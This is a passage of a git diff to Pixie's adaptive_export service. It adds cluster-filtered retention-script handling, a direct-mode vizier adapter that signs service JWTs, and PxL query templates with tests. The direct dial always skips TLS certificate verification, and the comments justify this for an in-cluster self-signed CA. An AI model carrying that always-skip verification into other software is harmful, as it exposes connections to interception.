+// clusterID. Caller diffs against GetPresetScripts to figure out what
+// to add / update / delete. Filters the cloud-returned ALL-clusters
+// script list to those that actually target the caller's clusterID —
+// without that filter, the diff later treats other clusters' scripts
+// as "stale on this cluster" and tries to delete them.
func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) {
resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{})
if err != nil {
@@ -184,31 +187,33 @@ func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Scr
var l []*script.Script
for _, s := range resp.Scripts {
if s.PluginId == clickhousePluginID {
+ clusterIDs := make([]string, 0, len(s.ClusterIDs))
+ // Empty clusterID = no filter (legacy callers; rare).
+ match := clusterID == ""
+ for _, id := range s.ClusterIDs {
+ idStr := utils.ProtoToUUIDStr(id)
+ clusterIDs = append(clusterIDs, idStr)
+ if idStr == clusterID {
+ match = true
+ }
+ }
+ if !match {
+ continue
+ }
sd, err := c.getScriptDefinition(s)
if err != nil {
return nil, err
}
l = append(l, &script.Script{
ScriptDefinition: *sd,
- ScriptId: utils.ProtoToUUIDStr(s.ScriptID),
- ClusterIds: getClusterIDsAsString(s.ClusterIDs),
+ ScriptID: utils.ProtoToUUIDStr(s.ScriptID),
+ ClusterIds: strings.Join(clusterIDs, ","),
})
}
}
return l, nil
}
-func getClusterIDsAsString(clusterIDs []*uuidpb.UUID) string {
- scriptClusterID := ""
- for i, id := range clusterIDs {
- if i > 0 {
- scriptClusterID = scriptClusterID + ","
- }
- scriptClusterID = scriptClusterID + utils.ProtoToUUIDStr(id)
- }
- return scriptClusterID
-}
-
func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) {
resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID})
if err != nil {
@@ -223,6 +228,19 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script
}, nil
}
+// DeleteDataRetentionScript removes the script with the given UUID.
+// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target
+// tables no longer in the schema.
+func (c *Client) DeleteDataRetentionScript(scriptID string) error {
+ req := &cloudpb.DeleteRetentionScriptRequest{
+ ID: utils.ProtoFromUUIDStrOrNil(scriptID),
+ }
+ _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req)
+ return err
+}
+
+// AddDataRetentionScript creates a new retention script on clusterID,
+// running every frequencyS seconds with the given PxL contents.
func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error {
req := &cloudpb.CreateRetentionScriptRequest{
ScriptName: scriptName,
@@ -236,24 +254,32 @@ func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, des
return err
}
-func (c *Client) UpdateDataRetentionScript(clusterID string, scriptID string, scriptName string, description string, frequencyS int64, contents string) error {
- req := &cloudpb.UpdateRetentionScriptRequest{
- ID: utils.ProtoFromUUIDStrOrNil(scriptID),
- ScriptName: &types.StringValue{Value: scriptName},
- Description: &types.StringValue{Value: description},
- Enabled: &types.BoolValue{Value: true},
- FrequencyS: &types.Int64Value{Value: frequencyS},
- Contents: &types.StringValue{Value: contents},
- ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)},
+// EnsureClickHousePluginEnabled is the boot-time idempotent op the
+// operator calls in main.go. If the plugin is already enabled with a
+// non-empty ExportURL, no-op. Otherwise, enable it with the supplied
+// fallback URL. Returns the resolved ExportURL for diagnostics.
+func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) {
+ plugin, err := c.GetClickHousePlugin()
+ if err != nil {
+ return "", err
}
- _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req)
- return err
-}
-
-func (c *Client) DeleteDataRetentionScript(scriptID string) error {
- req := &cloudpb.DeleteRetentionScriptRequest{
- ID: utils.ProtoFromUUIDStrOrNil(scriptID),
+ if plugin.RetentionEnabled {
+ cfg, err := c.GetClickHousePluginConfig()
+ if err != nil {
+ return "", err
+ }
+ if cfg.ExportURL != "" {
+ return cfg.ExportURL, nil
+ }
}
- _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req)
- return err
+ if fallbackExportURL == "" {
+ return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided")
+ }
+ if err := c.EnableClickHousePlugin(
+ &ClickHousePluginConfig{ExportURL: fallbackExportURL},
+ plugin.LatestVersion,
+ ); err != nil {
+ return "", err
+ }
+ return fallbackExportURL, nil
}
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel
new file mode 100644
index 00000000000..3cf661a2c79
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel
@@ -0,0 +1,38 @@
+load("@px//bazel:pl_build_system.bzl", "pl_go_test")
+
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+
+go_library(
+ name = "pixieapi",
+ srcs = ["pixieapi.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/api/go/pxapi",
+ "//src/api/go/pxapi/errdefs",
+ "//src/api/go/pxapi/types",
+ "//src/shared/services/utils",
+ ],
+)
+
+pl_go_test(
+ name = "pixieapi_test",
+ srcs = ["pixieapi_test.go"],
+ embed = [":pixieapi"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go
new file mode 100644
index 00000000000..61c8bef283f
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go
@@ -0,0 +1,223 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package pixieapi adapts pxapi to a flat-row Pixie interface for the
+// controller. Use when the operator (not the cloud's retention plugin)
+// is the writer of pixie observation rows — necessary on deployments
+// where the cloud can't reach an internal ClickHouse endpoint.
+package pixieapi
+
+import (
+ "context"
+ "errors"
+ "fmt"
+ "os"
+ "sync"
+
+ "px.dev/pixie/src/api/go/pxapi"
+ "px.dev/pixie/src/api/go/pxapi/errdefs"
+ "px.dev/pixie/src/api/go/pxapi/types"
+ jwtutils "px.dev/pixie/src/shared/services/utils"
+)
+
+// Row is a flat per-pixie-row map[col]any. Compatible with sink's
+// per-row JSONEachRow encoder.
+type Row map[string]any
+
+// Adapter executes PxL via pxapi and returns flat rows.
+type Adapter struct {
+ client *pxapi.Client
+ clusterID string
+ // directOpts, when non-nil, makes Query rebuild a pxapi.Client per
+ // call with a freshly-minted service JWT in WithBearerAuth. Used
+ // for direct-mode (in-cluster vizier-query-broker), where the cloud
+ // passthrough proxy is bypassed entirely. JWTs are minted fresh
+ // because GenerateJWTForService produces 10-minute claims and we
+ // want each fan-out window to carry its own valid token.
+ directOpts *DirectOptions
+}
+
+// DirectOptions configures direct-mode connection to vizier in-cluster.
+// Use when the cloud's passthrough proxy can't authorize the operator's
+// API key (e.g. self-hosted clouds where API keys are scoped per-cluster
+// and a freshly-deployed cluster isn't yet linked to the key's owner).
+type DirectOptions struct {
+ // VizierAddr is the in-cluster gRPC endpoint, typically
+ // "vizier-query-broker-svc.pl.svc.cluster.local:50300".
+ VizierAddr string
+ // SigningKey is the cluster's JWT signing key, mounted from
+ // pl-cluster-secrets/jwt-signing-key.
+ SigningKey string
+ // ServiceID is the issuer-side service identifier (claim "sub").
+ // Defaults to "adaptive_export" if empty.
+ ServiceID string
+}
+
+// New constructs an Adapter wired to the cluster's vizier via cloud passthrough.
+func New(client *pxapi.Client, clusterID string) *Adapter {
+ return &Adapter{client: client, clusterID: clusterID}
+}
+
+// NewDirect constructs an Adapter that bypasses the pixie cloud and
+// connects directly to the in-cluster vizier-query-broker. Each Query
+// call rebuilds the gRPC client with a fresh service JWT.
+//
+// TLS: direct dial uses pxapi.WithDirectTLSSkipVerify() (added in
+// PR #49 b523ce362 for the same node-IP-dial scenario PEM
+// direct-query needs). That option skips InsecureSkipVerify gating on
+// PX_DISABLE_TLS and on addr containing "cluster.local" — the AE
+// operator always targets cluster-internal vizier with a self-signed
+// CA we don't have a clean way to mount, so the always-skip semantics
+// match the deployment shape and remove the brittle env coupling.
+// CodeRabbit r3379377607.
+func NewDirect(clusterID string, opts DirectOptions) (*Adapter, error) {
+ if opts.ServiceID == "" {
+ opts.ServiceID = "adaptive_export"
+ }
+ return &Adapter{clusterID: clusterID, directOpts: &opts}, nil
+}
+
+// NewDirectFromEnv builds a direct-mode Adapter from the runtime env.
+// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and
+// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata
+// pod env conventions). Returns an error if either is missing.
+func NewDirectFromEnv(clusterID string) (*Adapter, error) {
+ addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR")
+ if addr == "" {
+ return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set")
+ }
+ sk := os.Getenv("PL_JWT_SIGNING_KEY")
+ if sk == "" {
+ return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)")
+ }
+ // NewDirect re-checks the PX_DISABLE_TLS + cluster.local precondition
+ // so both entry points get the same compile-time guard against pxapi's
+ // log.Fatal at first Query.
+ return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk})
+}
+
+// Query executes pxl on the configured cluster and aggregates every
+// emitted record from every table into one []Row.
+func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) {
+ client := a.client
+ if a.directOpts != nil {
+ // Direct mode: build fresh client + fresh service JWT for each
+ // query. JWT is 10-min; fan-out is seconds, so this is safe.
+ jwt, err := jwtutils.SignJWTClaims(
+ jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"),
+ a.directOpts.SigningKey,
+ )
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: sign JWT: %w", err)
+ }
+ // pxapi.Client doesn't expose a Close — its grpc.ClientConn is
+ // unexported. We accept GC-time reclamation: a Query in direct
+ // mode runs once per anomaly window per refresh interval (≥30s
+ // in production), so the per-query connection-leak rate is
+ // bounded and matched by goroutine + JWT expiry every ~10min.
+ // If we ever build a high-throughput direct-mode path, swap to
+ // a long-lived client + JWT-refresh ticker instead.
+ c, err := pxapi.NewClient(ctx,
+ pxapi.WithCloudAddr(a.directOpts.VizierAddr),
+ pxapi.WithDirectTLSSkipVerify(),
+ pxapi.WithBearerAuth(jwt),
+ )
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: direct dial: %w", err)
+ }
+ client = c
+ }
+ vz, err := client.NewVizierClient(ctx, a.clusterID)
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: vizier dial: %w", err)
+ }
+ mux := newCollector()
+ rs, err := vz.ExecuteScript(ctx, pxl, mux)
+ if err != nil {
+ return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err)
+ }
+ defer rs.Close()
+ if err := rs.Stream(); err != nil {
+ if errdefs.IsCompilationError(err) {
+ return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err)
+ }
+ return nil, fmt.Errorf("pixieapi: stream: %w", err)
+ }
+ return mux.rows(), nil
+}
+
+type collector struct {
+ mu sync.Mutex
+ all []Row
+}
+
+func newCollector() *collector { return &collector{} }
+
+func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) {
+ return &tableHandler{out: c}, nil
+}
+
+func (c *collector) rows() []Row {
+ c.mu.Lock()
+ defer c.mu.Unlock()
+ return append([]Row(nil), c.all...)
+}
+
+type tableHandler struct {
+ out *collector
+ meta types.TableMetadata
+}
+
+func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error {
+ h.meta = md
+ return nil
+}
+
+func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error {
+ row := make(Row, len(h.meta.ColInfo))
+ for _, col := range h.meta.ColInfo {
+ datum := rec.GetDatum(col.Name)
+ if datum == nil {
+ continue
+ }
+ row[col.Name] = datumValue(datum)
+ }
+ h.out.mu.Lock()
+ h.out.all = append(h.out.all, row)
+ h.out.mu.Unlock()
+ return nil
+}
+
+func (h *tableHandler) HandleDone(_ context.Context) error { return nil }
+
+func datumValue(d types.Datum) any {
+ switch v := d.(type) {
+ case *types.BooleanValue:
+ return v.Value()
+ case *types.Int64Value:
+ return v.Value()
+ case *types.Float64Value:
+ return v.Value()
+ case *types.StringValue:
+ return v.Value()
+ case *types.Time64NSValue:
+ return v.Value()
+ case *types.UInt128Value:
+ return v.Value()
+ default:
+ return d.String()
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go
new file mode 100644
index 00000000000..a664f8b245b
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go
@@ -0,0 +1,101 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pixieapi
+
+import (
+ "os"
+ "testing"
+)
+
+// The direct-mode constructors are the #36 broker-direct entry points (AE bypasses
+// the cloud passthrough → immune to the "cluster is not in a healthy state" gate).
+// These guards are what stop a misconfigured operator from crashing at first Query
+// (pxapi log.Fatal's on cluster.local without PX_DISABLE_TLS), so they must hold.
+
+func clearDirectEnv(t *testing.T) {
+ t.Helper()
+ for _, k := range []string{"ADAPTIVE_VIZIER_DIRECT_ADDR", "PL_JWT_SIGNING_KEY", "PX_DISABLE_TLS"} {
+ t.Setenv(k, "") // t.Setenv records + restores; "" then Unsetenv for a clean slate
+ os.Unsetenv(k)
+ }
+}
+
+func TestNewDirectFromEnv_MissingAddr(t *testing.T) {
+ clearDirectEnv(t)
+ if _, err := NewDirectFromEnv("cid"); err == nil {
+ t.Fatal("expected error when ADAPTIVE_VIZIER_DIRECT_ADDR is unset")
+ }
+}
+
+func TestNewDirectFromEnv_MissingSigningKey(t *testing.T) {
+ clearDirectEnv(t)
+ t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300")
+ if _, err := NewDirectFromEnv("cid"); err == nil {
+ t.Fatal("expected error when PL_JWT_SIGNING_KEY is unset")
+ }
+}
+
+// TestNewDirect_NoEnvGate — direct dial now uses pxapi.WithDirectTLSSkipVerify
+// (PR #49 b523ce362), which doesn't read PX_DISABLE_TLS at all. NewDirect
+// must therefore accept any addr regardless of env.
+func TestNewDirect_NoEnvGate(t *testing.T) {
+ clearDirectEnv(t)
+ for _, addr := range []string{
+ "vizier-query-broker-svc.pl.svc.cluster.local:50300",
+ "vizier.example:50300",
+ "10.42.0.5:50300",
+ } {
+ a, err := NewDirect("cid", DirectOptions{VizierAddr: addr, SigningKey: "k"})
+ if err != nil {
+ t.Fatalf("NewDirect(%q): %v", addr, err)
+ }
+ if a.directOpts == nil {
+ t.Fatalf("direct-mode Adapter must carry directOpts (so Query takes the broker path)")
+ }
+ if a.client != nil {
+ t.Error("direct-mode Adapter must NOT hold a cloud client (it dials per-query)")
+ }
+ if a.directOpts.ServiceID != "adaptive_export" {
+ t.Errorf("ServiceID should default to adaptive_export, got %q", a.directOpts.ServiceID)
+ }
+ }
+}
+
+func TestNewDirectFromEnv_Success(t *testing.T) {
+ clearDirectEnv(t)
+ t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300")
+ t.Setenv("PL_JWT_SIGNING_KEY", "signing-key")
+ t.Setenv("PX_DISABLE_TLS", "1")
+ a, err := NewDirectFromEnv("cluster-123")
+ if err != nil {
+ t.Fatalf("unexpected error: %v", err)
+ }
+ if a.directOpts == nil || a.clusterID != "cluster-123" {
+ t.Fatalf("expected direct Adapter for cluster-123, got %+v", a)
+ }
+ if a.directOpts.VizierAddr == "" || a.directOpts.SigningKey != "signing-key" {
+ t.Errorf("directOpts not populated from env: %+v", a.directOpts)
+ }
+}
+
+// New (cloud) path stays cloud — sanity that the two constructors don't cross-wire.
+func TestNewCloudHasNoDirectOpts(t *testing.T) {
+ a := New(nil, "cid")
+ if a.directOpts != nil {
+ t.Error("cloud Adapter must not have directOpts")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
index 80afa3f2875..606898d6eaf 100644
--- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
+++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel
@@ -15,16 +15,32 @@
# SPDX-License-Identifier: Apache-2.0
load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
go_library(
name = "pxl",
- srcs = ["pxl.go"],
+ srcs = [
+ "compile.go",
+ "queryfor.go",
+ "tables.go",
+ ],
importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl",
visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
deps = [
- "//src/api/go/pxapi",
- "//src/api/go/pxapi/errdefs",
- "//src/api/go/pxapi/types",
- "@com_github_sirupsen_logrus//:logrus",
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "pxl_test",
+ srcs = [
+ "compile_test.go",
+ "queryfor_bench_test.go",
+ "queryfor_test.go",
+ "tables_test.go",
+ ],
+ embed = [":pxl"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
],
)
diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile.go b/src/vizier/services/adaptive_export/internal/pxl/compile.go
new file mode 100644
index 00000000000..de3d16d0aad
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/compile.go
@@ -0,0 +1,74 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "fmt"
+ "strconv"
+ "strings"
+ "time"
+)
+
+// CompilePassthrough returns a precompiled PxL TEMPLATE for a firehose
+// (empty-Target) pull of `table` over a fixed rolling `window`. The result
+// is identical to QueryFor with an empty anomaly.Target EXCEPT the two
+// precise time_ bounds are left as `%d` verbs (lower, upper — both
+// UnixNano), to be rendered per tick with Render / fmt.Sprintf.
+//
+// Why a template instead of calling QueryFor every tick:
+// - QueryFor takes `now` and derives the relative `start_time=` bound from
+// `now - sliceStart`. For passthrough that delta is ALWAYS `window`, so
+// the relative bound is constant across ticks and can be baked in once.
+// - The script body (DataFrame, upid_to_namespace/pod, display) never
+// changes, so it is compiled once at loop construction rather than
+// re-resolved on every refresh.
+//
+// Only the two post-filter bounds vary per tick, so the rendered string is
+// byte-identical to what QueryFor would have produced for the same window —
+// the precompiled path is a pure performance/structure change, not a
+// behavioural one. upid→namespace/pod resolution stays in PxL (unchanged).
+func CompilePassthrough(table string, window time.Duration) (string, error) {
+ if !IsBuiltin(table) {
+ return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+ }
+ // Mirror QueryFor's pad: covers the full window plus a 30s safety
+ // margin, clamped to a 30s floor.
+ pad := window + 30*time.Second
+ if pad < 30*time.Second {
+ pad = 30 * time.Second
+ }
+ relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s"
+
+ // Builtin table names never contain '%', so embedding them around the
+ // two `%d` verbs is Sprintf-safe.
+ var b strings.Builder
+ b.WriteString(pxSetMaxRows)
+ b.WriteString("import px\n")
+ b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n")
+ b.WriteString("df = df[df.time_ >= px.int64_to_time(%d)]\n")
+ b.WriteString("df = df[df.time_ < px.int64_to_time(%d)]\n")
+ b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+ b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+ b.WriteString("px.display(df, '" + table + "')\n")
+ return b.String(), nil
+}
+
+// Render fills a CompilePassthrough template with the precise [sliceStart,
+// sliceEnd) bounds for one tick.
+func Render(tmpl string, sliceStart, sliceEnd time.Time) string {
+ return fmt.Sprintf(tmpl, sliceStart.UnixNano(), sliceEnd.UnixNano())
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile_test.go b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go
new file mode 100644
index 00000000000..724e12e827c
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go
@@ -0,0 +1,88 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// TestCompilePassthrough_MatchesQueryFor is the behaviour-preservation
+// proof: rendering a precompiled template for a window must produce the
+// EXACT bytes QueryFor emits for an empty Target over that same window.
+// If this holds, the compiled firehose path is a pure structural change —
+// it cannot capture differently than the legacy path it replaces.
+func TestCompilePassthrough_MatchesQueryFor(t *testing.T) {
+ window := 3 * time.Minute
+ // Fixed instant so UnixNano bounds are deterministic.
+ now := time.Unix(1778339984, 0).UTC()
+ sliceStart := now.Add(-window)
+ sliceEnd := now
+
+ legacy, err := QueryFor("http_events", anomaly.Target{}, sliceStart, sliceEnd, now)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ tmpl, err := CompilePassthrough("http_events", window)
+ if err != nil {
+ t.Fatalf("CompilePassthrough: %v", err)
+ }
+ got := Render(tmpl, sliceStart, sliceEnd)
+ if got != legacy {
+ t.Fatalf("rendered template != QueryFor\n--- compiled ---\n%s\n--- legacy ---\n%s", got, legacy)
+ }
+}
+
+// TestCompilePassthrough_Shape pins the essential tokens so an accidental
+// edit to the template (dropped time bound, lost upid resolution) fails
+// loudly even without the byte-equality oracle above.
+func TestCompilePassthrough_Shape(t *testing.T) {
+ tmpl, err := CompilePassthrough("dns_events", 60*time.Second)
+ if err != nil {
+ t.Fatalf("CompilePassthrough: %v", err)
+ }
+ for _, want := range []string{
+ "#px:set max_output_rows_per_table=1000000", // raise Pixie 10k cap
+ "px.DataFrame(table='dns_events', start_time='-90s')", // window 60s + 30s pad
+ "df.time_ >= px.int64_to_time(%d)",
+ "df.time_ < px.int64_to_time(%d)",
+ "px.upid_to_namespace(df.upid)",
+ "px.upid_to_pod_name(df.upid)",
+ "px.display(df, 'dns_events')",
+ } {
+ if !strings.Contains(tmpl, want) {
+ t.Errorf("template missing %q:\n%s", want, tmpl)
+ }
+ }
+ // Exactly two %d verbs (the two time bounds) — nothing else parameterized.
+ if n := strings.Count(tmpl, "%d"); n != 2 {
+ t.Errorf("template has %d %%d verbs, want 2:\n%s", n, tmpl)
+ }
+}
+
+// TestCompilePassthrough_UnknownTable rejects non-builtin tables, matching
+// QueryFor's contract.
+func TestCompilePassthrough_UnknownTable(t *testing.T) {
+ _, err := CompilePassthrough("not_a_table", time.Second)
+ if !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("err=%v want ErrUnknownTable", err)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go
deleted file mode 100644
index e4e27a40b6b..00000000000
--- a/src/vizier/services/adaptive_export/internal/pxl/pxl.go
+++ /dev/null
@@ -1,80 +0,0 @@
-// Copyright 2018- The Pixie Authors.
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-// SPDX-License-Identifier: Apache-2.0
-
-package pxl
-
-import (
- "context"
- "fmt"
-
- log "github.com/sirupsen/logrus"
- "px.dev/pixie/src/api/go/pxapi"
- "px.dev/pixie/src/api/go/pxapi/errdefs"
- "px.dev/pixie/src/api/go/pxapi/types"
-)
-
-// recordCounter counts the number of records received
-type recordCounter struct {
- count int
-}
-
-func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error {
- return nil
-}
-
-func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error {
- r.count++
- return nil
-}
-
-func (r *recordCounter) HandleDone(ctx context.Context) error {
- return nil
-}
-
-type recordCounterMux struct {
- counter *recordCounter
-}
-
-func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) {
- return m.counter, nil
-}
-
-// ExecuteScript executes a PxL script and returns the number of records returned
-func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) {
- vz, err := client.NewVizierClient(ctx, clusterID)
- if err != nil {
- return 0, fmt.Errorf("failed to create vizier client: %w", err)
- }
-
- counter := &recordCounter{}
- tm := &recordCounterMux{counter: counter}
-
- resultSet, err := vz.ExecuteScript(ctx, pxl, tm)
- if err != nil {
- return 0, fmt.Errorf("failed to execute script: %w", err)
- }
- defer resultSet.Close()
-
- if err := resultSet.Stream(); err != nil {
- if errdefs.IsCompilationError(err) {
- return 0, fmt.Errorf("PxL compilation error: %w", err)
- }
- return 0, fmt.Errorf("error streaming results: %w", err)
- }
-
- log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes)
- return counter.count, nil
-}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go
new file mode 100644
index 00000000000..168c54a4722
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go
@@ -0,0 +1,114 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "fmt"
+ "regexp"
+ "strconv"
+ "strings"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// ErrUnknownTable is returned by QueryFor for a table not in BuiltinTables.
+var ErrUnknownTable = errors.New("pxl: unknown pixie table")
+
+// pxSetMaxRows raises Pixie's per-table result cap via the query-broker's
+// own `#px:set` query flag (parsed from the script — see
+// src/vizier/services/query_broker/controllers/query_flags.go, default
+// max_output_rows_per_table = 10000). Without it the planner's
+// add_limit_to_batch_result_sink_rule silently truncates any px.display to
+// 10000 rows, so a wide firehose window (or a very busy pod) loses the
+// excess at the read. 1e6 is far above any realistic AE window. See
+// memory project-ae-passthrough-10k-cap.
+const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n"
+
+// QueryFor returns a PxL script that selects rows from `table` for the
+// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd). The
+// `now` argument lets us compute a relative `start_time=` for
+// px.DataFrame (PxL rejects ISO-string absolute bounds; we use a
